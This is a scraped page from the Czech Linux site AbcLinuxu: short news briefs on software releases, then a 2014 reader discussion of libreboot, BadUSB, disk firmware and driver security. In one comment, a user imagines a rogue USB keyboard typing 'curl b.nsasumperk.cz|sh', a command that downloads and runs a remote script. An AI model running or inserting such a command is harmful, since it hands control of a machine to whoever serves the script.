Byla vydána nová major verze 7.0 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Nově je postavena je na Debianu 13 (Trixie) a GNOME 48 (Bengaluru). Další novinky v příslušném seznamu.
Společnost Meta na dvoudenní konferenci Meta Connect 2025 představuje své novinky. První den byly představeny nové AI brýle: Ray-Ban Meta (Gen 2), sportovní Oakley Meta Vanguard a především Meta Ray-Ban Display s integrovaným displejem a EMG náramkem pro ovládání.
Po půl roce vývoje od vydání verze 48 bylo vydáno GNOME 49 s kódovým názvem Brescia (Mastodon). S přehrávačem videí Showtime místo Totemu a prohlížečem dokumentů Papers místo Evince. Podrobný přehled novinek i s náhledy v poznámkách k vydání a v novinkách pro vývojáře.
Open source softwarový stack ROCm (Wikipedie) pro vývoj AI a HPC na GPU od AMD byl vydán ve verzi 7.0.0. Přidána byla podpora AMD Instinct MI355X a MI350X.
Byla vydána nová verze 258 správce systému a služeb systemd (GitHub).
Byla vydána Java 25 / JDK 25. Nových vlastností (JEP - JDK Enhancement Proposal) je 18. Jedná se o LTS verzi.
Věra Pohlová před 26 lety: „Tyhle aféry každého jenom otravují. Já bych všechny ty internety a počítače zakázala“. Jde o odpověď na anketní otázku deníku Metro vydaného 17. září 1999 na téma zneužití údajů o sporožirových účtech klientů České spořitelny.
Byla publikována Výroční zpráva Blender Foundation za rok 2024 (pdf).
Byl vydán Mozilla Firefox 143.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Nově se Firefox při ukončování anonymního režimu zeptá, zda chcete smazat stažené soubory. Dialog pro povolení přístupu ke kameře zobrazuje náhled. Obzvláště užitečné při přepínání mezi více kamerami. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 143 bude brzy k dispozici také na Flathubu a Snapcraftu.
Byla vydána betaverze Fedora Linuxu 43 (ChangeSet), tj. poslední zastávka před vydáním finální verze, která je naplánována na úterý 21. října.
Nadace pro svobodný software (FSF) informuje o projektu libreboot. Stejně jako u projektu coreboot je cílem librebootu nahradit proprietární BIOS. Libreboot jde ale ještě dál a z corebootu odstraňuje všechny proprietární bloby. Nadace dále připomíná, že v prosinci 2013 byl představen notebook Gluglug X60 s certifikací Respects Your Freedom (zprávička). Tenkrát ještě s corebootem. Coreboot byl ale časem nahrazen librebootem a notebook přejmenován z Gluglug X60 na LibreBoot X60.
Tiskni
Sdílej:
6.8.2014 14:43
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
6.8.2014 17:09
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:52
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
7.8.2014 21:37
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
7.8.2014 21:42
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 15:44
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
A doted sem nezjistil, za co se mi vlastne mstis. Jen me tesi, ze te to tak vytocilo.
Co tu mám předvyplněno jako nick mě fakt nijak nezaměstnává
To te muselo neco vytocit. A poradne A to je fajn.
Otazka za zlateho bludistaka: cim to je, ze nadavam zrovna tobe (hele ty jsi ten troll co porad utoci na hagaru, zejo?)?
6.8.2014 17:16
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pro koho je tohle vlastne urcene?Pro lidi, kteří potřebují lowlevel přístup k hardware a potřebují hackovat bootovací proces. A pro lidi, kteří se bojí bezpečnostních chyb v originálním firmware (schválně nepíšu backdoorů, protože ty jsou v hardware; i když třeba AntiTheft s 3G modemem otevírá netušené nové možnosti; ale anténa k tomu modemu lze odstranit pájkou).
BTW jeste mi tam jeste chybi LibreCPU (InteLibre CoreDuo ?), LibreChipset, LibreNIC, LibreUSB, a dalsi...LibreCPU a LibreChipset. Ethernet je celkem jednoduchej. USB je horší.
6.8.2014 17:18
Jendа | skóre: 78
| blog: Jenda
| JO70FB
.
7.8.2014 00:42
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud věříš čipu, tak by ta ao486 měla jít spustit klidně na parallelleNo ale furt potřebuješ proprietární Xilinxové tooly, abys vygeneroval bitstream, ne? A k samotnému formátu bitstreamu žádná dokumentace neexistuje a k čipu už vůbec ne.
).
6.8.2014 17:32
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
USB je horší.Ano, hlavne po tom, co predvedli na Black Hatu
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...
6.8.2014 18:06
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Ano, hlavne po tom, co predvedli na Black HatuMyslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota. Phantom keyboard je tady už dlouho (NSA Litoměřice vám ji umí dodat přes noc) a to reprogamování flashek je zajímavé z hlediska hackování („jak jsem flashku předělal na ovladač jaderného reaktoru“), ale z bezpečnostního mě to moc nevzrušuje. Rozumné operační systémy mají samozřejmě firewall driverů a zeptají se, než připojí nové zařízení - a když připojím flashku a systém mi napíše „Našel jsem HID vstupní zařízení, chceš ho připojit jako klávesnici?“ a „Zařízení zadalo
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
<Alt><F2> curl b.nsasumperk.cz|sh<Return>“, tak se na toho, kdo mi tu flashku dal, usměju, informaci zavedu do systému GlobalEye a tím to končí.
A že to umí emulovat síťovku? Pokud nemáte rozbitej network manager (myslím ten typ software, ne tu konkrétní implementaci, která se naneštěstí jmenuje NetworkManager), tak vám po připojení síťovky přece nebude automaticky konfigurovat její DNS.
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :). Neomezené DMA do paměti to nemá (to už spíš je problém řadič, který sedí typicky na PCIe a může si vynutit bus mastering) a s daty to moc manipulovat nemůže, protože ze systému mu chodí už zašifrované bloky.
Ehm... Hard disk hackingJeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :)
6.8.2014 18:26
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:51
Jendа | skóre: 78
| blog: Jenda
| JO70FB
(nemám moc jiných možností jak to nabootovat).No, to ne no, leda si s sebou nosit flashku nebo SD kartu, ale vrchol praktičnosti to není...
6.8.2014 20:37
xkucf03 | skóre: 49
| blog: xkucf03
Nebo SecureBoot (kdyby tahle technologie pracovala ve prospěch uživatele). Ideálně mít právě ten coreboot/libreboot jako bezpečný startovací bod a pak z něj můžeš ověřit integritu boot sektoru, zavaděče nebo jádra.
6.8.2014 21:12
xkucf03 | skóre: 49
| blog: xkucf03
Přečteš si jeho zdrojáky a zkompiluješ si ho. Otázka je, kde vzít ten první důvěryhodný počítač, na kterém tohle udělat. Asi by šlo použít větší počet různě starých počítačů od různých výrobců a porovnat, zda výsledek je stejný. 
(že by byl ve všech stejný backdoor je nepravděpodobné)
7.8.2014 10:13
xkucf03 | skóre: 49
| blog: xkucf03
Za předpokladu, že to kontroluješ na důvěryhodném počítači1 a ten disassembler ti nekecá. Ale uznávám, že tohle je už hodně paranoidní
[1] a ten vezmeš kde?
7.8.2014 14:58
pavlix | skóre: 54
| blog: pavlix
7.8.2014 14:59
xkucf03 | skóre: 49
| blog: xkucf03
Proto jsem navrhoval radši to použití více různě starých počítačů – z nich si vyděruješ programy a porovnáš, jestli jsou díry na stejných místech.
6.8.2014 21:17
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 22:50
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
Myslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota.Pokud se nenajde nejaky 0day v USB stacku - vzpomen si na Stuxnet, tam je jich to na nic neptalo. Ja vim, ze to bylo na Widlich, ale Linux zacina byt taky v hledacku, hlavne po tom, co prosaklo, ze NSA zameruje "technicky zdatne uzivatele", cimz nemyslim to ohledne linuxjournal.
HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smažeMuze treba misto dat zapisovat nesmysly (k cemu jsou ti zasifrovana data, kdyz je neprectes). A taky - porad je to dual-core arm s dram, coz je prostredi pro beh cehokoli (nekde jsem mel odkaz, kde se na tm pokuseli rozbehnout linux).
7.8.2014 00:39
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud se nenajde nejaky 0day v USB stackuJo, to je pravda, že by se to pak dál šířilo. Spíš než přímo v USB stacku je ale podle mě mnohem (mnohem!) víc chyb v ovladačích zařízení. Zrovna včera v noci jsem ladil, proč mi nefunguje CH34xx (hint: řádek 312 a dál - what could possibly go wrong? :) a pokud jsou drivery běžně napsané tímto stylem, tak teda potěš koště. Další důvod pro driver firewalling.
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMASATA AFAIK jenom streamuje data, kam do paměti se zapíšou určuje řadič → musel by být bug tam (taky už jsem viděl řadič (VT6420), který uměl softwarově havarovat).
hint: řádek 312 a dálHehe, jaká krásná detekce NULL pointeru
(ale tady to aspoň není inline funkce, tam to je mnohem víc na pěst). Jinak ale myslím, že mnoho těch testů se neprovádí a předpokládá se, že kernel drivery jsou sane. Už třeba to vytáhnutí priv dat předpokládá validní pointer.
port_probe), takže driver může celkem spolehlivě předpokládat, že tam NULL nebude. Zjevně to není ten typ funkce, která by něco prováděla a mohla NULLem indikovat selhání, je to prostě getter.
7.8.2014 11:57
Jendа | skóre: 78
| blog: Jenda
| JO70FB
stty. A taky to při každém open() dělá znova celou inicializaci, což způsobí reset čipu a v tomto případě kvůli tomu i reset AVR, co je za ním.
a cortex m3, ktery udajne nic nedelaJe otázka zda by ten Cortex M3 stíhal zasahovat do práce těch dvou rychlých ARMů. Pořád může existovat normální firmware modul, který ho používá (ten člověk by musel dekompilovat všechny firmware moduly, aby si byl jistý). Nejspíš to bude pomocný procesor, který buď používají pro testování při provozu (ARMy "M" jsou malý). Nebo používá WD generickej čipset (seagate má tuším na zakázku).
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMA, otazka je, jestli se to neda vyuzit stejne jako Firewire, pokud ma clovek "spravny" firmware.Diskový řadič pouze posílá data na signál (od DMA řadiče nebo od CPU). IDE PRD tabulka (cílový region a délka) se klasicky nastavuje driverem. Zajímavý ale bude řešení toho SATA express portu (SATA+PCIe linka). Po PCIe se už dá zapisovat do hlavní RAM (ale to už zase bude nespíš s nějakým MMU pro PCIe).
USB je horší.Tak na USB full speed hosta jde použít PIC a nejspíš by šel bitbangovat na FPGA (blésmrt). A je dost možný, že budou existovat i nějaký phy bez integrovanýho firmware.
Dá se tady v ČR někde sehnat ten LibreBoot X60?
7.8.2014 08:37
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Díky za reakci. Může někdo prosím potvrdit, že má Jenda pravdu?
7.8.2014 12:20
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
Díky.
7.8.2014 19:44
Jendа | skóre: 78
| blog: Jenda
| JO70FB
jen by se asi hádali kvůli tomu librebootuNo tak se tam před reklamací vrátí původní firmware… Btw. Binary situation
7.8.2014 12:27
pavlix | skóre: 54
| blog: pavlix
7.8.2014 19:43
Jendа | skóre: 78
| blog: Jenda
| JO70FB
8.8.2014 00:01
pavlix | skóre: 54
| blog: pavlix
8.8.2014 06:24
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
8.8.2014 09:55
pavlix | skóre: 54
| blog: pavlix
8.8.2014 10:05
xkucf03 | skóre: 49
| blog: xkucf03
Nevíte někdo, jak je to s podporou virtualizace?
Na shop.gluglug.org.uk píší, že to má Core Duo T2400, což je podle Intelu 32-bit s podporou Intel® Virtualization Technology (VT-x) ovšem s poznámkou: This feature may not be available on all computing systems. A to jsem měl pocit, že se 32-bitové virtualizační procesory snad ani nedělaly.
8.8.2014 10:24
pavlix | skóre: 54
| blog: pavlix